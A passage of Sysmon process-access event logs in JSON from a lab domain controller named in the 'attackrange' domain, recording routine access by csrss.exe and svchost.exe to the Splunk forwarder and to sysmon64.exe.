{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","TargetProcessId":"3960","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1723,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 